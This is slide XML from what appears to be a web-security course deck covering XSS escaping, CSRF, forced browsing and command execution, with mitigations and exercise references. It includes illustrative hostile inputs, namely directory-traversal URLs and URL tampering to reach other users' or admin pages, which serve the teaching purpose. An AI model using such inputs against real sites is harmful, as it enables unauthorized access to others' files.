          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>&lt; becomes &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>&gt; becomes &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>“  becomes &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Exercises</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Practical 6 Exercises 3 and 4</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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(CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User has logged in to a website successfully and is browsing the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually the user would have multiple tabs open in his web browser and he is also surfing other sites at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If he encounters a malicious website with CSRF, his web browser may send unwanted requests to the authenticated website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Exercises</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Practical 6 Exercise 5</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because the user is already authenticated or identified to the website, the attacker can cause transactions to be carried out in the user’s account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The website thinks the request is a valid one from a valid user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pP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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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ways to mitigate</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> the CSRF vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Besides authenticating the user, the website can authenticate the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Send some challenge token/data associated with the current user session with the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Re-authenticate the user (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> one-time password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Users should log off properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>When performing important transactions, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Internet banking, don’t open multiple windows or tabs to surf other websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Forced Browsing</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Web servers generally access files that are reachable from its document root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>CGI may allow access to files not in document root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Attackers can craft an input via the browser to retrieve files not intended for him</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG"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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>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Forced Browsing Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>John is viewing his web documents and notes the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.abc.com/john/documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>He changes “john” to “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” and views Mary’s documents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.abc.com/mary/documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>He tries to access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>admin’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.abc.com/admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-S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Sites Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Web application security is more important now than ever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>OWASP top 10 vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Common Vulnerabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Cross site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Forceful browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Parameter tampering, cookie poisoning, hidden field manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SQL injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> and click on “Top 10”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Look for the Top 10 web application security risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG"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a:t>
            </a:fld>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Forced Browsing Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>John may even be able to access files in other directories of the Web Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.abc.com/../../../../reports/report1.pdf</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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3851920" y="2797069"/>
            <a:ext cx="511679" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0" smtClean="0"/>
              <a:t>C:/</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2003122" y="3474466"/>
            <a:ext cx="1051302" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>Inetpub</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1954525" y="4143937"/>
            <a:ext cx="1082348" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1872183" y="4861522"/>
            <a:ext cx="1313180" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>documents</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644183" y="5844760"/>
            <a:ext cx="620683" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>john</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2836549" y="5852775"/>
            <a:ext cx="697627" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" err="1" smtClean="0"/>
              <a:t>mary</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5220072" y="3465448"/>
            <a:ext cx="902811" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>reports</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382267" y="4393683"/>
            <a:ext cx="578419" cy="684659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5988107" y="4551346"/>
            <a:ext cx="1300356" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>report1.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2522248" y="3853855"/>
            <a:ext cx="6697" cy="3654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24553" y="4513269"/>
            <a:ext cx="0" cy="40842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31878" y="5218421"/>
            <a:ext cx="0" cy="40842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52120" y="3834780"/>
            <a:ext cx="0" cy="40842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62545" y="5635473"/>
            <a:ext cx="1143076" cy="22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0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1954524" y="5626849"/>
            <a:ext cx="1" cy="21791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641" y="5666118"/>
            <a:ext cx="1" cy="21791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91789" y="3318306"/>
            <a:ext cx="3160331" cy="27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83768" y="3309682"/>
            <a:ext cx="1" cy="21791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43218" y="3336315"/>
            <a:ext cx="8902" cy="19990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091729" y="3138917"/>
            <a:ext cx="1" cy="21791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26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Scanning Tools</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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Figure-19_3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827584" y="980728"/>
            <a:ext cx="6943725" cy="6200775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2348880"/>
            <a:ext cx="2879725" cy="3095625"/>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Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst/>
              <a:defRP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Tools like Paros or other scanning application can be used to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" smtClean="0"/>
              <a:t>other directories and webpages</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Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>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74845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Forced Browsing Example</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="250825" y="2133600"/>
            <a:ext cx="1657350" cy="3444875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>The URL may be manipulated to go to say /admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>To try entries like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>../../../../../../</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="Figure-19_1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect r="19878" b="24221"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2051720" y="1124744"/>
            <a:ext cx="7092280" cy="504056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Mitigating the vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Parse the parameters if they are being used to access files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Remove any ‘/’ or ‘\’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Avoid common names for admin page like ‘admin/’, ‘admin.php’, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Restricted web pages need to check if user is authenticated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Expires session variables as quickly as it is practical for your application</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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="964497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Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Poorly designed websites may allow the attacker to enter commands that will be executed on the web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Practical 6 Exercise 6</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24</a:t>
            </a:fld>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SG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
